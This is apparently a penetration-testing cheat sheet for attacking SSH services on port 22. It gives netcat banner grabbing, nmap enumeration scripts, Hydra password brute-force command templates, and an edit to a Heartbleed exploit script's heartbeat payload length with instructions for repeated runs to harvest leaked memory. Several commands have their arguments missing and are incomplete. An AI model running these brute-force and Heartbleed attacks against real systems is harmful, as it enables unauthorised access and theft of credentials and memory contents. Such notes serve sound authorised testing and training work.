# SSH (22) ## 1. Scanning {% code overflow="wrap" fullWidth="true" %} ``` Banner Grabbing - nc -vn 22 Initiate Connection - ssh @ [-p ] Identify public SSH key of server - ssh-keyscan -t rsa [-p ] dnsrecon -d -n dnsenum ssh-audit -v ``` {% endcode %} ## 2. Enumeration

Default nmap scripts for SSH - nmap -sC -p<port> <IP>
Retrieve version - nmap -sV -p<port> <IP>

Retrieve supported algorythms - 
    nmap --script ssh2-enum-algos -p<port> <IP>
Retrieve weak keys - 
    nmap --script ssh-hostkey --script-args ssh_hostkey=full -p<port> <IP>
Check authentication methods - 
    nmap --script ssh-auth-methods --script-args="ssh.user=root" -p<port> <IP>

## 3. Hydra {% code overflow="wrap" fullWidth="true" %} ``` hydra -l -p -s ssh:// hydra -l -P -s ssh:// hydra -L -P -s ssh:// hydra -L -p -s ssh:// ``` {% endcode %} ### 4. HeartBleed.py Download script via: Areas to modify {% tabs %} {% tab title="Before" %} ``` def build_heartbeat(tls_ver): heartbeat = [ 0x18, # Content Type (Heartbeat) 0x03, tls_ver, # TLS version 0x00, 0x03, # Length # Payload 0x01, # Type (Request) 0x40, 0x00 # Payload length // Modify this ] return heartbeat ``` {% endtab %} {% tab title="After" %} ``` def build_heartbeat(tls_ver): heartbeat = [ 0x18, # Content Type (Heartbeat) 0x03, tls_ver, # TLS version 0x00, 0x03, # Length # Payload 0x01, # Type (Request) 0x10, 0x00 # Payload length // Modify this ] return heartbeat ``` {% endtab %} {% endtabs %} To run

Default Execution - python heartbleed.py <IP>
Include Hexdump in output - python heartbleed.py -x <IP>

Repeated run - python heartbleed.py -n <count> <IP>
    # Filter output for interesting keywords
    # Remember to enumerate other services while this runs